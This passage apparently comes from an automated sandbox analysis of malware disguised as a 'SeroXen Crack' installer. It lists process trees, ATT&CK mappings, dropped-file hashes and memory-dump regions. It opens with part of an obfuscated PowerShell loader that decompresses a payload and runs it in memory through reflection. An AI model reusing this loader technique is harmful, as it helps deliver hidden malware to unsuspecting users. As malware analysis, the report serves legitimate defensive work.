$GiWwX.Length);$wCTZr.Dispose();$Elzpw.Dispose();$KHdof = New-Object System.IO.MemoryStream(, $GiWwX);$mdDGq = New-Object System.IO.MemoryStream;$PZsap = New-Object System.IO.Compression.GZipStream($KHdof, [IO.Compression.CompressionMode]::$kveij1);$PZsap.$jgfOd($mdDGq);$PZsap.Dispose();$KHdof.Dispose();$mdDGq.Dispose();$GiWwX = $mdDGq.ToArray();$cyNnW = $muibj | IEX;$YHPse = $cyNnW::$kveij2($GiWwX);$aMqIy = $YHPse.EntryPoint;$aMqIy.$kveij0($null, (, [string[]] ($XPhKE)))
      4⤵
      PID:4516
  - - C:\Windows\SysWOW64\dllhost.exe
      C:\Windows\SysWOW64\dllhost.exe /Processid:{348f657b-edf7-4018-a089-f0851ac85d23}
      4⤵
      PID:3252
  - - C:\Windows\system32\wermgr.exe
      "C:\Windows\system32\wermgr.exe" "-outproc" "0" "4260" "2540" "2448" "2536" "0" "0" "2544" "0" "0" "0" "0" "0"
      4⤵
      PID:3856

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1900

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\SeroXen Crack\SeroXen-install.bat.exe

Filesize
440KB

MD5
0e9ccd796e251916133392539572a374

SHA1
eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204

SHA256
c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221

SHA512
e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uvb11aes.zg1.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Windows\$sxr-cmd.exe

Filesize
324KB

MD5
c5db7b712f280c3ae4f731ad7d5ea171

SHA1
e8717ff0d40e01fd3b06de2aa5a401bed1c907cc

SHA256
f6c9532e1f4b66be96f0f56bd7c3a3c1997ea8066b91bfcc984e41f072c347ba

SHA512
bceaf7dc30f2c99b40b7025a5eb063f3131a1ef9349fdf356720eaef838bcf58ce3d5e3bad9459ddd2f872df430bdb66a766a5acff5d3bbc738eba8945cb0a89

Download Submit
C:\Windows\$sxr-mshta.exe

Filesize
32KB

MD5
356e04e106f6987a19938df67dea0b76

SHA1
f2fd7cde5f97427e497dfb07b7f682149dc896fb

SHA256
4ed8a115fa1dcfd532397b800775c1b54d2d407b52118b5423e94ff1ce855d7e

SHA512
df1c655fa3a95e001084af8c3aa97c54dbcb690210e1353dd836702cfb4af3c857449df62aa62d7ab525ffb4e0dc1552181dfcdee2c28f4af5c20df6d95811cd

Download Submit
C:\Windows\$sxr-powershell.exe

Filesize
412KB

MD5
24618109d9af6dc9ae383430cff3b318

SHA1
74710d46dbc7f4358ac40d4fa6d32a54762efe51

SHA256
7c838164c9cd0d255dc5a5e257a49ff9d80079dd7a9343c2c92ac4fc3578f80b

SHA512
3f0b5df7c01975bc7785a0ffe21b5d0f406e6e6a3e62aad54ab4324b0620ea96d215978af5da25f9fc2d3365f0b5d737624b1f13895cea2aaa2aeff1a699ebd3

Download Submit
memory/432-136-0x00007FFC98170000-0x00007FFC98180000-memory.dmp

Filesize
64KB

Download
memory/432-143-0x000002341EA20000-0x000002341EA47000-memory.dmp

Filesize
156KB

Download
memory/432-133-0x000002341EA20000-0x000002341EA47000-memory.dmp

Filesize
156KB

Download
memory/472-146-0x000001A256690000-0x000001A2566B7000-memory.dmp

Filesize
156KB

Download
memory/472-140-0x000001A256690000-0x000001A2566B7000-memory.dmp

Filesize
156KB

Download
memory/472-144-0x00007FFC98170000-0x00007FFC98180000-memory.dmp

Filesize
64KB

Download
memory/636-154-0x0000026082060000-0x0000026082087000-memory.dmp

Filesize
156KB

Download
memory/636-156-0x00007FFC98170000-0x00007FFC98180000-memory.dmp

Filesize
64KB

Download
memory/640-137-0x00007FFCD8184000-0x00007FFCD8185000-memory.dmp

Filesize
4KB

Download
memory/640-125-0x00007FFC98170000-0x00007FFC98180000-memory.dmp

Filesize
64KB

Download
memory/640-120-0x0000017CD4F40000-0x0000017CD4F62000-memory.dmp

Filesize
136KB

Download
memory/640-123-0x0000017CD4F70000-0x0000017CD4F97000-memory.dmp

Filesize
156KB

Download
memory/660-32-0x00000233B37D0000-0x00000233B37DA000-memory.dmp

Filesize
40KB

Download
memory/660-15-0x00000233B3140000-0x00000233B3150000-memory.dmp

Filesize
64KB

Download
memory/660-30-0x00000233B3140000-0x00000233B3150000-memory.dmp

Filesize
64KB

Download
memory/660-34-0x00000233B3140000-0x00000233B3150000-memory.dmp

Filesize
64KB

Download
memory/660-36-0x00007FFCD6690000-0x00007FFCD674D000-memory.dmp

Filesize
756KB

Download
memory/660-22-0x00000233CC0A0000-0x00000233CCAF0000-memory.dmp

Filesize
10.3MB

Download
memory/660-24-0x00007FFCB6C60000-0x00007FFCB7722000-memory.dmp

Filesize
10.8MB

Download
memory/660-33-0x00007FFCD80E0000-0x00007FFCD82E9000-memory.dmp

Filesize
2.0MB

Download
memory/660-28-0x00000233B3780000-0x00000233B37A2000-memory.dmp

Filesize
136KB

Download
memory/660-20-0x00007FFCD80E0000-0x00007FFCD82E9000-memory.dmp

Filesize
2.0MB

Download
memory/660-19-0x00007FFCD6690000-0x00007FFCD674D000-memory.dmp

Filesize
756KB

Download
memory/660-42-0x00000233B3140000-0x00000233B3150000-memory.dmp

Filesize
64KB

Download
memory/660-27-0x00000233CCBA0000-0x00000233CCBF8000-memory.dmp

Filesize
352KB

Download
memory/660-26-0x00000233CBD30000-0x00000233CBD86000-memory.dmp

Filesize
344KB

Download
memory/660-18-0x00007FFCD80E0000-0x00007FFCD82E9000-memory.dmp

Filesize
2.0MB

Download
memory/660-17-0x00000233B3750000-0x00000233B3774000-memory.dmp

Filesize
144KB

Download
memory/660-66-0x00007FFCD80E0000-0x00007FFCD82E9000-memory.dmp

Filesize
2.0MB

Download
memory/660-16-0x00000233B3140000-0x00000233B3150000-memory.dmp

Filesize
64KB

Download
memory/660-21-0x00007FFCD80E0000-0x00007FFCD82E9000-memory.dmp

Filesize
2.0MB

Download
memory/660-14-0x00000233B3140000-0x00000233B3150000-memory.dmp

Filesize
64KB

Download
memory/660-13-0x00007FFCB6C60000-0x00007FFCB7722000-memory.dmp

Filesize
10.8MB

Download
memory/660-29-0x00007FFCD80E0000-0x00007FFCD82E9000-memory.dmp

Filesize
2.0MB

Download
memory/660-25-0x00000233CCAF0000-0x00000233CCB96000-memory.dmp

Filesize
664KB

Download
memory/660-9-0x00000233CBA80000-0x00000233CBAA2000-memory.dmp

Filesize
136KB

Download
memory/696-128-0x00007FFC98170000-0x00007FFC98180000-memory.dmp

Filesize
64KB

Download
memory/696-127-0x0000024E17F50000-0x0000024E17F77000-memory.dmp

Filesize
156KB

Download
memory/720-150-0x0000014214360000-0x0000014214387000-memory.dmp

Filesize
156KB

Download
memory/720-157-0x00007FFC98170000-0x00007FFC98180000-memory.dmp

Filesize
64KB

Download
memory/992-135-0x00007FFC98170000-0x00007FFC98180000-memory.dmp

Filesize
64KB

Download
memory/992-142-0x00000207D3130000-0x00000207D3157000-memory.dmp

Filesize
156KB

Download
memory/992-132-0x00000207D3130000-0x00000207D3157000-memory.dmp

Filesize
156KB

Download
memory/1056-153-0x0000024975860000-0x0000024975887000-memory.dmp

Filesize
156KB

Download
memory/1056-158-0x00007FFC98170000-0x00007FFC98180000-memory.dmp

Filesize
64KB

Download
memory/1056-160-0x0000024975860000-0x0000024975887000-memory.dmp

Filesize
156KB

Download
memory/1120-163-0x00007FFC98170000-0x00007FFC98180000-memory.dmp

Filesize
64KB

Download
memory/1120-166-0x000002185C300000-0x000002185C327000-memory.dmp

Filesize
156KB

Download
memory/1120-159-0x000002185C300000-0x000002185C327000-memory.dmp

Filesize
156KB

Download
memory/1176-170-0x000001A9F5F60000-0x000001A9F5F87000-memory.dmp

Filesize
156KB

Download
memory/1220-174-0x000002B3843A0000-0x000002B3843C7000-memory.dmp

Filesize
156KB

Download
memory/1304-178-0x000002844F680000-0x000002844F6A7000-memory.dmp

Filesize
156KB

Download
memory/1332-184-0x0000018336330000-0x0000018336357000-memory.dmp

Filesize
156KB

Download
memory/1340-189-0x00000230E1FD0000-0x00000230E1FF7000-memory.dmp

Filesize
156KB

Download
memory/1408-194-0x000001CDCFDC0000-0x000001CDCFDE7000-memory.dmp

Filesize
156KB

Download
memory/1424-197-0x000001C22F740000-0x000001C22F767000-memory.dmp

Filesize
156KB

Download
memory/1444-202-0x00000129E2CF0000-0x00000129E2D17000-memory.dmp

Filesize
156KB

Download
memory/1472-40-0x0000000140000000-0x0000000140004000-memory.dmp

Filesize
16KB

Download
memory/1472-35-0x0000000140000000-0x0000000140004000-memory.dmp

Filesize
16KB

Download
memory/4260-71-0x00007FFCD80E0000-0x00007FFCD82E9000-memory.dmp

Filesize
2.0MB

Download
memory/4260-91-0x000001DC560E0000-0x000001DC562A2000-memory.dmp

Filesize
1.8MB

Download
memory/4260-108-0x000001DC55DD0000-0x000001DC55E06000-memory.dmp

Filesize
216KB

Download
memory/4260-107-0x00007FFCD6690000-0x00007FFCD674D000-memory.dmp

Filesize
756KB

Download
memory/4260-106-0x00007FFCD80E0000-0x00007FFCD82E9000-memory.dmp

Filesize
2.0MB

Download
memory/4260-111-0x00007FFCD80E0000-0x00007FFCD82E9000-memory.dmp

Filesize
2.0MB

Download
memory/4260-56-0x00007FFCB6C60000-0x00007FFCB7722000-memory.dmp

Filesize
10.8MB

Download
memory/4260-65-0x000001DC54E40000-0x000001DC54E50000-memory.dmp

Filesize
64KB

Download
memory/4260-67-0x000001DC54E40000-0x000001DC54E50000-memory.dmp

Filesize
64KB

Download
memory/4260-113-0x00007FFCD80E0000-0x00007FFCD82E9000-memory.dmp

Filesize
2.0MB

Download
memory/4260-69-0x00007FFCD6690000-0x00007FFCD674D000-memory.dmp

Filesize
756KB

Download
memory/4260-105-0x00007FFCD80E0000-0x00007FFCD82E9000-memory.dmp

Filesize
2.0MB

Download
memory/4260-104-0x000001DC55CF0000-0x000001DC55D3E000-memory.dmp

Filesize
312KB

Download
memory/4260-103-0x000001DC55D90000-0x000001DC55DCC000-memory.dmp

Filesize
240KB

Download
memory/4260-70-0x00007FFCD80E0000-0x00007FFCD82E9000-memory.dmp

Filesize
2.0MB

Download
memory/4260-94-0x000001DC54E40000-0x000001DC54E50000-memory.dmp

Filesize
64KB

Download
memory/4260-68-0x00007FFCD80E0000-0x00007FFCD82E9000-memory.dmp

Filesize
2.0MB

Download
memory/4260-72-0x000001DC55360000-0x000001DC558E4000-memory.dmp

Filesize
5.5MB

Download
memory/4260-88-0x000001DC55D40000-0x000001DC55D90000-memory.dmp

Filesize
320KB

Download
memory/4260-90-0x000001DC55E50000-0x000001DC55F02000-memory.dmp

Filesize
712KB

Download
memory/4260-89-0x000001DC54E40000-0x000001DC54E50000-memory.dmp

Filesize
64KB

Download
memory/4260-84-0x00007FFCB6C60000-0x00007FFCB7722000-memory.dmp

Filesize
10.8MB

Download
memory/4260-77-0x00007FFCD80E0000-0x00007FFCD82E9000-memory.dmp

Filesize
2.0MB

Download
memory/4260-76-0x000001DC54E20000-0x000001DC54E42000-memory.dmp

Filesize
136KB

Download
memory/4260-75-0x000001DC5E9D0000-0x000001DC5EA82000-memory.dmp

Filesize
712KB

Download
memory/4260-74-0x000001DC5E590000-0x000001DC5E9CE000-memory.dmp

Filesize
4.2MB

Download
memory/4260-73-0x000001DC5DDC0000-0x000001DC5E58A000-memory.dmp

Filesize
7.8MB

Download
memory/4492-109-0x0000000140000000-0x0000000140028000-memory.dmp

Filesize
160KB

Download
memory/4492-112-0x0000000140000000-0x0000000140028000-memory.dmp

Filesize
160KB

Download
memory/4492-115-0x00007FFCD80E0000-0x00007FFCD82E9000-memory.dmp

Filesize
2.0MB

Download
memory/4492-118-0x0000000140000000-0x0000000140028000-memory.dmp

Filesize
160KB

Download
memory/4492-116-0x00007FFCD6690000-0x00007FFCD674D000-memory.dmp

Filesize
756KB

Download
memory/4516-92-0x00007FFCB6C60000-0x00007FFCB7722000-memory.dmp

Filesize
10.8MB

Download
memory/4516-93-0x000001D11C410000-0x000001D11C420000-memory.dmp

Filesize
64KB

Download
memory/4684-41-0x0000000000400000-0x0000000000406000-memory.dmp

Filesize
24KB

Download
memory/4684-38-0x0000000000400000-0x0000000000406000-memory.dmp

Filesize
24KB

Download